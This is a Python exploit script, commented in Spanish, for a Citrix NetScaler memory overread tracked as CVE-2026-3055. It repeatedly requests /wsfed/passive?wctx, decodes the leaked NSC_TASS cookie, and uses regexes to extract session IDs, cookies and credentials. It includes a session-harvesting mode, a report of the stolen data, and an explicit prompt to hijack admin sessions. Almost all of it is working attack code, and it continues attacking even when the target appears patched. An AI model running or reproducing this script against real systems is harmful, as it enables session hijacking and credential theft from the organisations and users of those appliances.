#!/usr/bin/env python3 """ CVE-2026-3055 - Citrix NetScaler Memory Overread Exploit Explota vulnerabilidad de lectura fuera de límites en /wsfed/passive?wctx """ import argparse import base64 import requests import urllib3 import sys import re import time from colorama import init, Fore, Style from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) init(autoreset=True) BANNER = f""" {Fore.CYAN}╔══════════════════════════════════════════════════════════════════╗ ║ CVE-2026-3055 - Citrix NetScaler Memory Overread Exploit ║ ║ Memory leak via /wsfed/passive?wctx ║ ║ watchTowr Research - Aliz Hammond ║ ╚══════════════════════════════════════════════════════════════════════╝{Style.RESET_ALL} """ class NetScalerMemoryLeak: """Exploit para CVE-2026-3055""" def __init__(self, target, verbose=False, output_file=None): self.target = target.rstrip('/') self.verbose = verbose self.output_file = output_file self.session = requests.Session() self.session.verify = False self.vulnerable = None self.leaked_data = [] def check_vulnerability(self): """Verifica si el objetivo es vulnerable""" print(f"{Fore.CYAN}[*] Checking {self.target} for CVE-2026-3055...{Style.RESET_ALL}") try: # Solicitud vulnerable url = f"{self.target}/wsfed/passive?wctx" resp = self.session.get(url, timeout=10, allow_redirects=False) # Verificar cookie NSC_TASS tass_cookie = resp.cookies.get('NSC_TASS') if tass_cookie: print(f"{Fore.GREEN}[+] NSC_TASS cookie found!{Style.RESET_ALL}") # Decodificar para verificar contenido try: decoded = base64.b64decode(tass_cookie) if len(decoded) > 100: # Si hay datos significativos print(f"{Fore.RED}[!] VULNERABLE: Memory leak detected{Style.RESET_ALL}") print(f" Cookie length: {len(tass_cookie)} chars") print(f" Decoded size: {len(decoded)} bytes") self.vulnerable = True return True except: pass print(f"{Fore.YELLOW}[?] NSC_TASS present but may be patched{Style.RESET_ALL}") self.vulnerable = False return False else: print(f"{Fore.YELLOW}[-] No NSC_TASS cookie - likely patched{Style.RESET_ALL}") self.vulnerable = False return False except requests.exceptions.RequestException as e: print(f"{Fore.RED}[-] Connection error: {e}{Style.RESET_ALL}") self.vulnerable = False return False def leak_memory(self, iterations=10, delay=0.5): """Realiza múltiples solicitudes para obtener memoria filtrada""" print(f"\n{Fore.CYAN}[*] Starting memory leak ({iterations} iterations)...{Style.RESET_ALL}") for i in range(iterations): try: url = f"{self.target}/wsfed/passive?wctx" resp = self.session.get(url, timeout=10, allow_redirects=False) tass_cookie = resp.cookies.get('NSC_TASS') if tass_cookie: decoded = base64.b64decode(tass_cookie) # Buscar datos sensibles sensitive_data = self._extract_sensitive(decoded) leak_info = { "iteration": i + 1, "raw_b64": tass_cookie, "raw_hex": decoded.hex()[:200], "decoded_preview": decoded[:500], "size": len(decoded), "sensitive": sensitive_data } self.leaked_data.append(leak_info) if self.verbose: self._print_leak(leak_info) elif sensitive_data: print(f"{Fore.RED}[!] Iteration {i+1}: Found sensitive data!{Style.RESET_ALL}") for data_type, value in sensitive_data.items(): if value: print(f" {data_type}: {value[:100]}") if sensitive_data.get("session_id"): print(f"\n{Fore.GREEN}[✓] SESSION ID EXTRACTED:{Style.RESET_ALL}") print(f" {sensitive_data['session_id']}") print(f"\n{Fore.YELLOW}[!] Use this session ID to hijack admin session{Style.RESET_ALL}") time.sleep(delay) except Exception as e: if self.verbose: print(f"{Fore.RED}[-] Error in iteration {i+1}: {e}{Style.RESET_ALL}") return self.leaked_data def _extract_sensitive(self, data): """Extrae datos sensibles de la memoria filtrada""" sensitive = { "session_id": None, "cookies": [], "headers": [], "urls": [], "credentials": [] } data_str = data.decode('ascii', errors='ignore') # Buscar session IDs (patrones comunes) session_patterns = [ r'NSC_TASS[=:]\s*([A-Za-z0-9+/=]+)', r'session[=:]\s*([A-Za-z0-9]+)', r'[A-Za-z0-9]{32,}', # IDs largos r'[0-9a-f]{32}', r'[0-9a-f]{40}', r'[0-9a-f]{64}' ] for pattern in session_patterns: matches = re.findall(pattern, data_str) if matches: sensitive["session_id"] = matches[0][:100] break # Buscar cookies cookie_matches = re.findall(r'(?:Cookie|Set-Cookie)[=:]\s*([^\r\n]+)', data_str, re.I) sensitive["cookies"] = cookie_matches[:5] # Buscar headers HTTP header_matches = re.findall(r'([A-Za-z-]+):\s*([^\r\n]+)', data_str) sensitive["headers"] = header_matches[:10] # Buscar URLs url_matches = re.findall(r'(https?://[^\s"\']+)', data_str) sensitive["urls"] = url_matches[:5] # Buscar posibles credenciales cred_patterns = [ r'(?:password|passwd|pwd)[=:]\s*([^\s&]+)', r'(?:user|username|login)[=:]\s*([^\s&]+)' ] for pattern in cred_patterns: matches = re.findall(pattern, data_str, re.I) sensitive["credentials"].extend(matches) return {k: v for k, v in sensitive.items() if v} def _print_leak(self, leak_info): """Imprime información del leak""" print(f"\n{Fore.CYAN}--- Iteration {leak_info['iteration']} ---{Style.RESET_ALL}") print(f"Size: {leak_info['size']} bytes") print(f"Hex preview: {leak_info['raw_hex']}...") print(f"Decoded preview: {leak_info['decoded_preview'][:200]}...") if leak_info['sensitive']: print(f"{Fore.RED}[!] SENSITIVE DATA FOUND:{Style.RESET_ALL}") for key, value in leak_info['sensitive'].items(): if value: print(f" {key}: {str(value)[:100]}") def harvest_sessions(self, iterations=50, delay=0.3): """Harvestea session IDs de manera continua""" print(f"\n{Fore.CYAN}[*] Harvesting session IDs ({iterations} iterations)...{Style.RESET_ALL}") sessions_found = [] for i in range(iterations): try: url = f"{self.target}/wsfed/passive?wctx" resp = self.session.get(url, timeout=10, allow_redirects=False) tass_cookie = resp.cookies.get('NSC_TASS') if tass_cookie: decoded = base64.b64decode(tass_cookie) data_str = decoded.decode('ascii', errors='ignore') # Buscar session IDs for pattern in [r'[A-Za-z0-9]{32,}', r'[0-9a-f]{32}', r'[0-9a-f]{40}']: matches = re.findall(pattern, data_str) for match in matches: if len(match) >= 20 and match not in sessions_found: sessions_found.append(match) print(f"{Fore.GREEN}[+] Session found: {match}{Style.RESET_ALL}") time.sleep(delay) except Exception as e: if self.verbose: print(f"{Fore.RED}[-] Error: {e}{Style.RESET_ALL}") return sessions_found def generate_report(self): """Genera reporte de los datos filtrados""" if not self.leaked_data: print(f"{Fore.YELLOW}[-] No data to report{Style.RESET_ALL}") return report = [] report.append("=" * 60) report.append("CVE-2026-3055 - Memory Leak Report") report.append("=" * 60) report.append(f"Target: {self.target}") report.append(f"Total leaks: {len(self.leaked_data)}") report.append("") all_sensitive = {} for i, leak in enumerate(self.leaked_data): if leak.get('sensitive'): for key, value in leak['sensitive'].items(): if key not in all_sensitive: all_sensitive[key] = [] all_sensitive[key].extend(value if isinstance(value, list) else [value]) report.append("=== EXTRACTED SENSITIVE DATA ===") for key, values in all_sensitive.items(): unique_values = list(set(values)) report.append(f"\n{key.upper()}:") for val in unique_values[:10]: report.append(f" - {val}") report_text = "\n".join(report) if self.output_file: with open(self.output_file, 'w') as f: f.write(report_text) print(f"{Fore.GREEN}[+] Report saved to {self.output_file}{Style.RESET_ALL}") print(report_text) return report_text def main(): parser = argparse.ArgumentParser(description='CVE-2026-3055 - Citrix NetScaler Memory Overread Exploit') parser.add_argument('target', help='Target URL (e.g., https://192.168.1.100)') parser.add_argument('-i', '--iterations', type=int, default=10, help='Number of leak iterations') parser.add_argument('-d', '--delay', type=float, default=0.5, help='Delay between requests (seconds)') parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output') parser.add_argument('-o', '--output', help='Output file for report') parser.add_argument('-s', '--session-harvest', action='store_true', help='Harvest session IDs') parser.add_argument('-c', '--check-only', action='store_true', help='Only check vulnerability') args = parser.parse_args() print(BANNER) # Validar URL if not args.target.startswith('http'): args.target = f"https://{args.target}" exploit = NetScalerMemoryLeak(args.target, args.verbose, args.output) # Verificar vulnerabilidad if not exploit.check_vulnerability(): print(f"{Fore.RED}[-] Target does not appear vulnerable{Style.RESET_ALL}") if not args.check_only: print(f"{Fore.YELLOW}[!] Continuing anyway (may be patched)...{Style.RESET_ALL}") if args.check_only: sys.exit(0) if args.session_harvest: sessions = exploit.harvest_sessions(args.iterations, args.delay) print(f"\n{Fore.CYAN}[*] Total sessions harvested: {len(sessions)}{Style.RESET_ALL}") for session in sessions[:10]: print(f" {session}") else: # Leak memoria exploit.leak_memory(args.iterations, args.delay) # Generar reporte exploit.generate_report() print(f"\n{Fore.CYAN}[*] Exploit completed{Style.RESET_ALL}") if __name__ == "__main__": main()